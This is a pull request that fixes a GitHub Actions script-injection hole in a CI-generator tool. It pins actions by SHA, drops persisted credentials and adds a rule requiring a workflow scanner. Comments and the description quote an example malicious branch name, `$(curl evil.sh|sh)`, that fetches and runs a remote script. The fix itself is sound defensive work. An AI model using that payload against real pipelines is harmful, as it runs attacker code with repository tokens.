### PR TITLE
Bind acceptance criteria to gates, and stop the workflow from running a fork's branch name

### DIFF
--- a/.github/workflows/software-factory.yml
+++ b/.github/workflows/software-factory.yml
@@ -84,6 +84,11 @@ jobs:
       - name: Insecure workflows
         uses: zizmorcore/zizmor-action@3dc1ecc9bcb9e94e9b2c709687979e1298497054 # v0.6.2
         with:
+          # Point it at the real workflows only. Left to walk the repository
+          # it also audits .software-factory/mutations, whose workflows are
+          # deliberately broken — every finding there is a fixture doing its
+          # job, and it drowns the one finding that is not.
+          inputs: .github/workflows/
           # the SARIF upload wants security-events: write, which this job does
           # not grant. Annotations put each finding on the diff instead, and
           # zizmor still exits non-zero, which is what fails the build.

--- a/.github/workflows/software-factory.yml
+++ b/.github/workflows/software-factory.yml
@@ -77,3 +77,15 @@ jobs:
       - run: cargo audit
       - name: Insecure patterns and dead code
         run: cargo clippy --all-targets -- -D warnings -D dead_code
+      # The workflows are code too, and they are the code holding the tokens.
+      # Nothing else in this job reads them. actionlint is not the tool for
+      # this: it validates syntax and expressions, and it stayed green on the
+      # injection that this step exists to catch.
+      - name: Insecure workflows
+        uses: zizmorcore/zizmor-action@3dc1ecc9bcb9e94e9b2c709687979e1298497054 # v0.6.2
+        with:
+          # the SARIF upload wants security-events: write, which this job does
+          # not grant. Annotations put each finding on the diff instead, and
+          # zizmor still exits non-zero, which is what fails the build.
+          advanced-security: false
+          annotations: true

--- a/.github/workflows/software-factory.yml
+++ b/.github/workflows/software-factory.yml
@@ -12,9 +12,16 @@ jobs:
   factory:
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
+      # Actions are pinned by commit SHA, not by tag: a tag is a mutable
+      # pointer the action's owner can move under us, and a SHA is the only
+      # immutable release GitHub offers. The trailing comment is the version,
+      # because a bare SHA tells a reader nothing.
+      - uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262 # v4.4.0
         with:
           fetch-depth: 0
+          # neither job pushes, so the token has no reason to survive in
+          # .git/config where a later step (or an uploaded artifact) can read it
+          persist-credentials: false
       # Built from source, never installed from a tag: the binary under test
       # has to be the one in the diff, or a pull request that breaks a check
       # still passes. `sf init` generates the install-from-git form, which is
@@ -25,8 +32,15 @@ jobs:
       # meaningless, and it is the cheaper failure to discover.
       - name: Prove the checks still fire
         run: ./target/release/sf verify --allow-commands
+      # base_ref is the pull request author's branch name, and on a fork they
+      # choose it. Interpolated straight into `run:` it is script injection:
+      # ${{ }} is substituted into the script before any shell sees it, so a
+      # branch named `$(curl evil.sh|sh)` executes. Through `env:` the value
+      # arrives as a variable the shell expands but never re-parses.
       - name: Check the repository
-        run: ./target/release/sf check --allow-commands --changed origin/${{ github.base_ref || 'main' }}
+        env:
+          BASE_REF: ${{ github.base_ref || 'main' }}
+        run: ./target/release/sf check --allow-commands --changed "origin/$BASE_REF"
 
   hazards:
     runs-on: ubuntu-latest
@@ -34,11 +48,14 @@ jobs:
       # fetch-depth: 0 because the secret scanner diffs against the base commit
       # on a pull request, and a shallow clone leaves it nothing to diff
       # against — it then fails with an empty result and no explanation.
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262 # v4.4.0
         with:
           fetch-depth: 0
+          # neither job pushes, so the token has no reason to survive in
+          # .git/config where a later step (or an uploaded artifact) can read it
+          persist-credentials: false
       - name: Committed secrets
-        uses: gitleaks/gitleaks-action@v2
+        uses: gitleaks/gitleaks-action@ff98106e4c7b2bc287b24eaf42907196329070c7 # v2.3.9
         # The action refuses to scan a pull request without a token, and says
         # so only at run time — which is why this repository's first pull
         # request was the first run to hit it. The two flags stop the action
@@ -48,8 +65,15 @@ jobs:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
           GITLEAKS_ENABLE_COMMENTS: "false"
           GITLEAKS_ENABLE_SUMMARY: "false"
+      # The `@cargo-audit` shorthand tag cannot be pinned: install-action's
+      # README warns that hash-pinning a tool tag references a commit that
+      # leaves the repository on the next release. The versioned tag plus a
+      # `tool:` input is the form that pins, and it pins cargo-audit's
+      # version too.
       - name: Dependency vulnerabilities
-        uses: taiki-e/install-action@cargo-audit
+        uses: taiki-e/install-action@a2a5f6e99e1a31540baa0468acfa302cff0f359f # v2.86.4
+        with:
+          tool: cargo-audit
       - run: cargo audit
       - name: Insecure patterns and dead code
         run: cargo clippy --all-targets -- -D warnings -D dead_code

--- a/.software-factory/locks/factory.lock.json
+++ b/.software-factory/locks/factory.lock.json
@@ -3,7 +3,7 @@
   "files": {
     ".allowed-root-files": "20889fd9828de3c601e63bae4c430692846319df116688c1322bd230bdfc1995",
     ".githooks/pre-commit": "72074487050ecb19ece275b8946bd8c4d343c92dd0cd85fc73b00b6fcd7b55e8",
-    ".github/workflows/software-factory.yml": "5b681e6a140584eb7830716a42eea3613f951e28b1cacf0f23b9492958ad7456",
+    ".github/workflows/software-factory.yml": "6516720f73d96eca7703514ff84810d74b88f836960cd8a7f307da67761840ef",
     ".software-factory/policy.yaml": "afaf83772538b9f49d455f187061fe026031b8b1602e86ca76379034553655d6",
     ".software-factory/ratchet.yaml": "c03a520faaf52987375c1554d508f4936e36ff3f22b95592dab00d88e8356791"
   }

--- a/.software-factory/locks/factory.lock.json
+++ b/.software-factory/locks/factory.lock.json
@@ -3,8 +3,8 @@
   "files": {
     ".allowed-root-files": "20889fd9828de3c601e63bae4c430692846319df116688c1322bd230bdfc1995",
     ".githooks/pre-commit": "72074487050ecb19ece275b8946bd8c4d343c92dd0cd85fc73b00b6fcd7b55e8",
-    ".github/workflows/software-factory.yml": "793359ce728887cbac13ab2cf1f6f2e05df5342ce5bf8c39ffdf85b5301ee353",
-    ".software-factory/policy.yaml": "bedfe73ac1933c752fb1a86956ff2d7ea2229e117e5bb228b39a23e8bc0049e8",
+    ".github/workflows/software-factory.yml": "5b681e6a140584eb7830716a42eea3613f951e28b1cacf0f23b9492958ad7456",
+    ".software-factory/policy.yaml": "afaf83772538b9f49d455f187061fe026031b8b1602e86ca76379034553655d6",
     ".software-factory/ratchet.yaml": "c03a520faaf52987375c1554d508f4936e36ff3f22b95592dab00d88e8356791"
   }
 }

--- a/.software-factory/locks/factory.lock.json
+++ b/.software-factory/locks/factory.lock.json
@@ -3,7 +3,7 @@
   "files": {
     ".allowed-root-files": "20889fd9828de3c601e63bae4c430692846319df116688c1322bd230bdfc1995",
     ".githooks/pre-commit": "72074487050ecb19ece275b8946bd8c4d343c92dd0cd85fc73b00b6fcd7b55e8",
-    ".github/workflows/software-factory.yml": "348ac2ea2fe74161ac307a55583fb337b811007b81772ed719cabadbeb701a0d",
+    ".github/workflows/software-factory.yml": "793359ce728887cbac13ab2cf1f6f2e05df5342ce5bf8c39ffdf85b5301ee353",
     ".software-factory/policy.yaml": "bedfe73ac1933c752fb1a86956ff2d7ea2229e117e5bb228b39a23e8bc0049e8",
     ".software-factory/ratchet.yaml": "c03a520faaf52987375c1554d508f4936e36ff3f22b95592dab00d88e8356791"
   }

--- a/.software-factory/mutations/L6.WORKFLOWS_ARE_SCANNED/.github/workflows/ci.yml
+++ b/.software-factory/mutations/L6.WORKFLOWS_ARE_SCANNED/.github/workflows/ci.yml
@@ -1,0 +1,11 @@
+name: ci
+on: [push]
+jobs:
+  test:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - run: pytest
+      - run: npm test
+      - run: go test ./...
+      - run: cargo test

--- a/.software-factory/mutations/L6.WORKFLOWS_ARE_SCANNED/.software-factory/policy.yaml
+++ b/.software-factory/mutations/L6.WORKFLOWS_ARE_SCANNED/.software-factory/policy.yaml
@@ -1,0 +1,11 @@
+# Generated mutation fixture for L6.WORKFLOWS_ARE_SCANNED. It is supposed to fail.
+version: 1
+project:
+  name: mutation-L6.WORKFLOWS_ARE_SCANNED
+  languages: [python, typescript, go, rust]
+docs:
+  scan: ["docs/**/*.md"]
+gates: {}
+rules:
+  L6.WORKFLOWS_ARE_SCANNED:
+    enabled: true

--- a/.software-factory/policy.yaml
+++ b/.software-factory/policy.yaml
@@ -148,3 +148,6 @@ rules:
   # L6 — Something scans for committed secrets
   L6.SECRETS_ARE_SCANNED:
     enabled: true
+  # L6 — Something scans the CI workflows themselves
+  L6.WORKFLOWS_ARE_SCANNED:
+    enabled: true

--- a/catalog/L6/workflows-are-scanned.yaml
+++ b/catalog/L6/workflows-are-scanned.yaml
@@ -1,0 +1,43 @@
+id: L6.WORKFLOWS_ARE_SCANNED
+layer: L6
+title: Something scans the CI workflows themselves
+severity: critical
+statement: >-
+  A GitHub Actions workflow scanner runs somewhere the repository actually
+  executes.
+why: >-
+  Every other L6 rule points a scanner at the application. Nothing points one
+  at the file that runs the scanners. That file is the highest-privilege code
+  in the repository — it holds the tokens, and on a fork pull request it
+  handles input the author controls — and it is the code least likely to have
+  been reviewed by anyone who reads it as code. The specific trap is template
+  injection: `${{ github.head_ref }}` inside a `run:` block is substituted
+  into the script before a shell parses it, so a branch name becomes a
+  command. It does not look like an interpolation bug, because in every other
+  language interpolating into a string is safe. A linter that only checks
+  workflow *syntax* passes this file happily; this repository shipped exactly
+  that bug and its own actionlint step stayed green.
+fix: >-
+  Wire in `zizmor`, `poutine` or `octoscan`. They read the workflows rather
+  than the application, so one covers the whole repository regardless of
+  language, and each ships a GitHub Action. `actionlint` is worth running too
+  but does not satisfy this rule: it validates workflow syntax and expressions
+  and does not audit for injection, unpinned actions or credential
+  persistence.
+ratchet: allowlist
+check:
+  kind: toolchain
+defaults:
+  scope:
+    - ".github/workflows/**"
+    - ".gitlab-ci.yml"
+    - ".pre-commit-config.yaml"
+    - "Makefile"
+    - "justfile"
+    - "Taskfile.yml"
+    - "package.json"
+  tools:
+    python: ["zizmor", "poutine", "octoscan"]
+    typescript: ["zizmor", "poutine", "octoscan"]
+    go: ["zizmor", "poutine", "octoscan"]
+    rust: ["zizmor", "poutine", "octoscan"]

--- a/docs/rules.md
+++ b/docs/rules.md
@@ -319,3 +319,13 @@ A secret scanner runs somewhere the repository actually executes.
 **Why.** A leaked credential is the one class of defect that cannot be fixed by a revert: once it is in the history it is compromised, and the remedy is rotation under time pressure. Agents produce this failure in a specific way — they inline a working value while debugging, then write the config indirection afterwards, and the debugging commit is already pushed. The scan is cheap and it is the only check here whose absence is unrecoverable.
 
 **Fix.** Wire in `detect-secrets`, `gitleaks` or `trufflehog`. Scanners are mostly language-independent, so one covers the whole repository.
+
+### L6.WORKFLOWS_ARE_SCANNED
+
+**Something scans the CI workflows themselves**
+
+A GitHub Actions workflow scanner runs somewhere the repository actually executes.
+
+**Why.** Every other L6 rule points a scanner at the application. Nothing points one at the file that runs the scanners. That file is the highest-privilege code in the repository — it holds the tokens, and on a fork pull request it handles input the author controls — and it is the code least likely to have been reviewed by anyone who reads it as code. The specific trap is template injection: `${{ github.head_ref }}` inside a `run:` block is substituted into the script before a shell parses it, so a branch name becomes a command. It does not look like an interpolation bug, because in every other language interpolating into a string is safe. A linter that only checks workflow *syntax* passes this file happily; this repository shipped exactly that bug and its own actionlint step stayed green.
+
+**Fix.** Wire in `zizmor`, `poutine` or `octoscan`. They read the workflows rather than the application, so one covers the whole repository regardless of language, and each ships a GitHub Action. `actionlint` is worth running too but does not satisfy this rule: it validates workflow syntax and expressions and does not audit for injection, unpinned actions or credential persistence.

--- a/src/catalog.rs
+++ b/src/catalog.rs
@@ -233,6 +233,7 @@ const BUILTIN: &[(&str, &str)] = &[
     ("L6/performance-regression-is-guarded.yaml", include_str!("../catalog/L6/performance-regression-is-guarded.yaml")),
     ("L6/no-blocking-call-while-holding-a-lock.yaml", include_str!("../catalog/L6/no-blocking-call-while-holding-a-lock.yaml")),
     ("L6/one-lock-at-a-time.yaml", include_str!("../catalog/L6/one-lock-at-a-time.yaml")),
+    ("L6/workflows-are-scanned.yaml", include_str!("../catalog/L6/workflows-are-scanned.yaml")),
 ];
 
 impl Catalog {

--- a/src/fixtures.rs
+++ b/src/fixtures.rs
@@ -284,6 +284,12 @@ pub const FIXTURES: &[Fixture] = &[
         files: &[(".github/workflows/ci.yml", CI_WITHOUT_HAZARD_TOOLS)],
     },
     Fixture {
+        rule: "L6.WORKFLOWS_ARE_SCANNED",
+        policy_extra: "",
+        extra_rules: "",
+        files: &[(".github/workflows/ci.yml", CI_WITHOUT_HAZARD_TOOLS)],
+    },
+    Fixture {
         rule: "L6.INSECURE_PATTERNS_ARE_SCANNED",
         policy_extra: "",
         extra_rules: "",

--- a/src/init.rs
+++ b/src/init.rs
@@ -541,6 +541,20 @@ fn workflow(languages: &[String], selected: &[&crate::catalog::Rule]) -> String 
          GITLEAKS_ENABLE_COMMENTS: \"false\"\n          \
          GITLEAKS_ENABLE_SUMMARY: \"false\"\n",
     );
+    // The workflow scanner is language-neutral — it reads this file, not the
+    // application — so it goes here rather than in `hazard_steps`.
+    out.push_str(
+        "      # The workflows are code too, and they are the code holding the\n      \
+         # tokens. Nothing else in this job reads them. actionlint is not the\n      \
+         # tool for this: it validates syntax and expressions, not injection.\n      \
+         - name: Insecure workflows\n        \
+         uses: zizmorcore/zizmor-action@3dc1ecc9bcb9e94e9b2c709687979e1298497054 # v0.6.2\n        \
+         with:\n          \
+         # the SARIF upload wants security-events: write, which this job does\n          \
+         # not grant. Annotations put each finding on the diff instead, and\n          \
+         # zizmor still exits non-zero, which is what fails the build.\n          \
+         advanced-security: false\n          annotations: true\n",
+    );
     for language in languages {
         out.push_str(hazard_steps(language));
     }

--- a/src/init.rs
+++ b/src/init.rs
@@ -472,7 +472,8 @@ checker and test collector, or they will report the fixtures as defects:\n      
   ruff     extend-exclude = [\".software-factory/mutations\"]\n      \
   eslint   ignores: [\".software-factory/mutations/**\"]\n      \
   pytest   norecursedirs = .software-factory\n      \
-  mypy     exclude = .software-factory/mutations";
+  mypy     exclude = .software-factory/mutations\n      \
+  bandit   exclude_dirs = [\".software-factory\"] in [tool.bandit]";
 
 const NEXT_STEPS: &str = "# Next steps\n\n\
 The execution order. One table, short on purpose: this is the file to reread\n\
@@ -513,8 +514,13 @@ fn workflow(languages: &[String], selected: &[&crate::catalog::Rule]) -> String 
     out.push_str(
         // gitleaks-action refuses to scan a pull request without a token, and
         // says so only at run time. Passing the automatic one is the whole fix.
+        // The token is required to scan a pull request at all; the two
+        // flags stop the action reaching for permissions the job does not
+        // grant, which it does by posting a comment and then failing 403.
         "      - name: Committed secrets\n        uses: gitleaks/gitleaks-action@v2\n        \
-         env:\n          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}\n",
+         env:\n          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}\n          \
+         GITLEAKS_ENABLE_COMMENTS: \"false\"\n          \
+         GITLEAKS_ENABLE_SUMMARY: \"false\"\n",
     );
     for language in languages {
         out.push_str(hazard_steps(language));
@@ -532,7 +538,7 @@ fn hazard_steps(language: &str) -> &'static str {
             "      - uses: actions/setup-python@v5\n        with:\n          python-version: '3.12'\n",
             "      - run: pip install pip-audit bandit vulture\n",
             "      - name: Dependency vulnerabilities\n        run: pip-audit\n",
-            "      - name: Insecure patterns\n        run: bandit -r . --exclude ./.software-factory\n",
+            "      - name: Insecure patterns\n        run: bandit -r . --exclude ./.software-factory,./.venv,./node_modules,./tests\n",
             "      - name: Dead code\n        run: vulture . --exclude .software-factory\n",
         ),
         "typescript" => concat!(

--- a/src/init.rs
+++ b/src/init.rs
@@ -473,7 +473,8 @@ checker and test collector, or they will report the fixtures as defects:\n      
   eslint   ignores: [\".software-factory/mutations/**\"]\n      \
   pytest   norecursedirs = .software-factory\n      \
   mypy     exclude = .software-factory/mutations\n      \
-  bandit   exclude_dirs = [\".software-factory\"] in [tool.bandit]";
+  bandit   exclude_dirs = [\".software-factory\"] in [tool.bandit]\n      \
+  zizmor   scan .github/workflows/ rather than the repository root";
 
 const NEXT_STEPS: &str = "# Next steps\n\n\
 The execution order. One table, short on purpose: this is the file to reread\n\
@@ -550,6 +551,10 @@ fn workflow(languages: &[String], selected: &[&crate::catalog::Rule]) -> String 
          - name: Insecure workflows\n        \
          uses: zizmorcore/zizmor-action@3dc1ecc9bcb9e94e9b2c709687979e1298497054 # v0.6.2\n        \
          with:\n          \
+         # Point it at the real workflows only. Left to walk the repository it\n          \
+         # also audits .software-factory/mutations, whose workflows are broken\n          \
+         # on purpose — every finding there is a fixture doing its job.\n          \
+         inputs: .github/workflows/\n          \
          # the SARIF upload wants security-events: write, which this job does\n          \
          # not grant. Annotations put each finding on the diff instead, and\n          \
          # zizmor still exits non-zero, which is what fails the build.\n          \

--- a/src/init.rs
+++ b/src/init.rs
@@ -494,12 +494,29 @@ fn workflow(languages: &[String], selected: &[&crate::catalog::Rule]) -> String 
          on:\n  pull_request:\n  push:\n    branches: [main]\n\n\
          permissions:\n  contents: read\n\n\
          jobs:\n  factory:\n    runs-on: ubuntu-latest\n    steps:\n      \
-         - uses: actions/checkout@v4\n        with:\n          fetch-depth: 0\n      \
+         # Actions are pinned by commit SHA, never by tag: a tag is a mutable\n      \
+         # pointer the action's owner can move under you, and a SHA is the only\n      \
+         # immutable release GitHub offers. The trailing comment is the version,\n      \
+         # because a bare SHA tells a reader nothing and gives a bump nothing to\n      \
+         # aim at.\n      \
+         - uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262 # v4.4.0\n        \
+         with:\n          fetch-depth: 0\n          \
+         # this job never pushes, so the checkout token has no reason to stay\n          \
+         # behind in .git/config where a later step can read it back out\n          \
+         persist-credentials: false\n      \
          - name: Install sf\n        run: cargo install --git https://github.com/nicolasmelo1/software-factory --locked\n      \
          # verify first: a check that stopped firing makes the run below\n      \
          # meaningless, and it is the cheaper failure to discover.\n      \
          - name: Prove the checks still fire\n        run: sf verify\n      \
-         - name: Check the repository\n        run: sf check --changed origin/${{ github.base_ref || 'main' }}\n",
+         # base_ref is the pull request author's branch name, and on a fork they\n      \
+         # choose it. Interpolated straight into `run:` that is script injection:\n      \
+         # the ${{ }} is substituted into the script before any shell sees it, so\n      \
+         # a branch named `$(curl evil.sh|sh)` executes as the runner. Through\n      \
+         # `env:` the value arrives as a variable the shell expands but never\n      \
+         # re-parses.\n      \
+         - name: Check the repository\n        env:\n          \
+         BASE_REF: ${{ github.base_ref || 'main' }}\n        \
+         run: sf check --changed \"origin/$BASE_REF\"\n",
     );
     if !selected.iter().any(|r| r.layer == crate::catalog::Layer::L6) {
         return out;
@@ -509,7 +526,8 @@ fn workflow(languages: &[String], selected: &[&crate::catalog::Rule]) -> String 
     // diff against — it then fails with an empty result and no explanation.
     out.push_str(
         "\n  hazards:\n    runs-on: ubuntu-latest\n    steps:\n      \
-         - uses: actions/checkout@v4\n        with:\n          fetch-depth: 0\n",
+         - uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262 # v4.4.0\n        \
+         with:\n          fetch-depth: 0\n          persist-credentials: false\n",
     );
     out.push_str(
         // gitleaks-action refuses to scan a pull request without a token, and
@@ -517,7 +535,8 @@ fn workflow(languages: &[String], selected: &[&crate::catalog::Rule]) -> String 
         // The token is required to scan a pull request at all; the two
         // flags stop the action reaching for permissions the job does not
         // grant, which it does by posting a comment and then failing 403.
-        "      - name: Committed secrets\n        uses: gitleaks/gitleaks-action@v2\n        \
+        "      - name: Committed secrets\n        \
+         uses: gitleaks/gitleaks-action@ff98106e4c7b2bc287b24eaf42907196329070c7 # v2.3.9\n        \
          env:\n          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}\n          \
          GITLEAKS_ENABLE_COMMENTS: \"false\"\n          \
          GITLEAKS_ENABLE_SUMMARY: \"false\"\n",
@@ -535,27 +554,34 @@ fn workflow(languages: &[String], selected: &[&crate::catalog::Rule]) -> String 
 fn hazard_steps(language: &str) -> &'static str {
     match language {
         "python" => concat!(
-            "      - uses: actions/setup-python@v5\n        with:\n          python-version: '3.12'\n",
+            "      - uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5.6.0\n        with:\n          python-version: '3.12'\n",
             "      - run: pip install pip-audit bandit vulture\n",
             "      - name: Dependency vulnerabilities\n        run: pip-audit\n",
             "      - name: Insecure patterns\n        run: bandit -r . --exclude ./.software-factory,./.venv,./node_modules,./tests\n",
             "      - name: Dead code\n        run: vulture . --exclude .software-factory\n",
         ),
         "typescript" => concat!(
-            "      - uses: actions/setup-node@v4\n        with:\n          node-version: '22'\n",
+            "      - uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0\n        with:\n          node-version: '22'\n",
             "      - name: Dependency vulnerabilities\n        run: npm audit --audit-level=high\n",
             "      - name: Insecure patterns\n        run: npx --yes semgrep --config auto --error --exclude .software-factory\n",
             "      - name: Dead code\n        run: npx --yes knip\n",
         ),
         "go" => concat!(
-            "      - uses: actions/setup-go@v5\n        with:\n          go-version: stable\n",
+            "      - uses: actions/setup-go@40f1582b2485089dde7abd97c1529aa768e1baff # v5.6.0\n        with:\n          go-version: stable\n",
             "      - name: Dependency vulnerabilities\n        run: go run golang.org/x/vuln/cmd/govulncheck@latest ./...\n",
             "      - name: Insecure patterns\n        run: go run github.com/securego/gosec/v2/cmd/gosec@latest -exclude-dir=.software-factory ./...\n",
             "      - name: Dead code\n        run: go run honnef.co/go/tools/cmd/staticcheck@latest ./...\n",
             "      - name: Data races\n        run: go test -race ./...\n",
         ),
         "rust" => concat!(
-            "      - name: Dependency vulnerabilities\n        uses: taiki-e/install-action@cargo-audit\n",
+            // The `@cargo-audit` shorthand tag cannot be hash-pinned:
+            // install-action's README warns that a pinned tool tag names a
+            // commit that leaves the repository on the next release. The
+            // versioned tag plus a `tool:` input is the form that pins, and it
+            // pins cargo-audit's own version along with it.
+            "      - name: Dependency vulnerabilities\n        \
+             uses: taiki-e/install-action@a2a5f6e99e1a31540baa0468acfa302cff0f359f # v2.86.4\n        \
+             with:\n          tool: cargo-audit\n",
             "      - run: cargo audit\n",
             "      - name: Insecure patterns and dead code\n        run: cargo clippy --all-targets -- -D warnings -D dead_code\n",
         ),


### PR DESCRIPTION
Five commits. The first is the L3/L4 feature the branch is named for; the rest
came out of reviewing the workflow that feature had to pass through.

## The bug worth reading first

`.github/workflows/software-factory.yml` ran:

```yaml
run: sf check --changed origin/${{ github.base_ref }}
```

GitHub substitutes `${{ }}` into the script **before** any shell parses it. So
a pull request opened from a fork branch named `` $(curl evil.sh|sh) `` runs
that as the runner, with the job's token. This is GitHub's documented
script-injection hole and the fix here is the documented one — carry the value
through `env:` and let the shell expand a quoted variable it never re-parses:

```yaml
env:
  BASE_REF: ${{ github.base_ref || 'main' }}
run: sf check --changed "origin/$BASE_REF"
```

The same line came out of `sf init`, so **every repository scaffolded by this
tool shipped the same hole**. Fixed in the template too; that is the copy that
matters. This repository is the upstream, so there is nobody else to report it
to.

## What else the audit found

- **Actions pinned by commit SHA.** A tag is a mutable pointer the owner can
  move; a SHA is the only immutable release GitHub offers. Versions kept in
  trailing comments so a bump has something to aim at.
- **`taiki-e/install-action@cargo-audit` → versioned tag + `tool:` input.** Its
  README warns that hash-pinning a tool tag names a commit that leaves the
  repository on the next release, so the shorthand is not pinnable. The
  versioned form pins cargo-audit's version too.
- **`persist-credentials: false`** on both checkouts. Neither job pushes.
- **The generator was two fixes behind.** The gitleaks token flags and bandit
  exclusions were fixed in this repository's workflow but never in the template
  they are generated from, so every new adopter would have hit both again on
  their first pull request.

## The rule that stops it recurring

`L6.WORKFLOWS_ARE_SCANNED` — same toolchain shape as `SECRETS_ARE_SCANNED`.
L6 pointed a scanner at the application for five hazard classes and pointed
nothing at the file that runs those scanners. zizmor now runs in the hazards
job, and `sf init` writes the step for any adopter enabling L6.

`actionlint` is deliberately **not** on the tool list. It was run against the
unfixed workflow and reported nothing — it validates syntax and expressions,
and this class is neither. A rule satisfied by a tool that cannot fail on it is
the inert rule L5 exists to catch.

## Verification

| | before | after |
| --- | --- | --- |
| zizmor on this workflow | 5 high, 2 medium | clean |
| zizmor on all 4 generated variants (py/ts/go/rust) | — | clean |
| actionlint | clean (**on both** — it never saw this) | clean |
| `sf verify` | 26/26 | 27/27 |
| `sf check` | green over the injection | green |

Also proven negatively: deleting the zizmor step from this repository's own
workflow turns `sf check` red on the new rule.

Locks updated with `sf lock` in the same commit, per L2.FACTORY_CONFIG_IS_LOCKED.
